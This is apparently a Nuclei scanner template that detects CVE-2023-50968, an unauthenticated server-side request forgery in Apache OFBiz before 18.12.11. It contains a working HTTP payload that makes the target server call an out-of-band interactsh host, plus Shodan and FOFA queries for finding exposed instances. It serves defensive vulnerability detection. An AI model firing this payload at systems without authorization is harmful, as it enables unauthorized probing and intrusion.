id: CVE-2023-50968 info: name: Apache OFBiz < 18.12.11 - Server Side Request Forgery author: your3cho severity: high description: | Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue. reference: - https://lists.apache.org/thread/x5now4bk3llwf3k58kl96qvtjyxwp43q - http://www.openwall.com/lists/oss-security/2023/12/26/2 - https://nvd.nist.gov/vuln/detail/CVE-2023-50968 - https://issues.apache.org/jira/browse/OFBIZ-12875 - https://ofbiz.apache.org/download.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-50968 cwe-id: CWE-918,CWE-200 epss-score: 0.32266 epss-percentile: 0.96615 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: apache product: ofbiz shodan-query: html:"OFBiz" fofa-query: app="Apache_OFBiz" tags: cve,cve2023,apache,ofbiz,ssrf variables: str: "{{rand_base(6)}}" http: - raw: - | POST /partymgr/control/{{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded {{parameter}}={"http://{{interactsh-url}}/api":"{{str}}"} payloads: path: - getJSONuiLabel - getJSONuiLabelArray parameter: - requiredLabel - requiredLabels attack: clusterbomb stop-at-first-match: true matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: header words: - 'OFBiz.Visitor=' # digest: 490a00463044022040e378f08f425867a4da9383e75123bebf9acb790e7e3aa528b45f6d2f610be202206082fa933b506d90b7eeaf07e3ace10fbc5382b24483ab3e6a652c6c47dd9e70:922c64590222798bb761d5b6d8e72950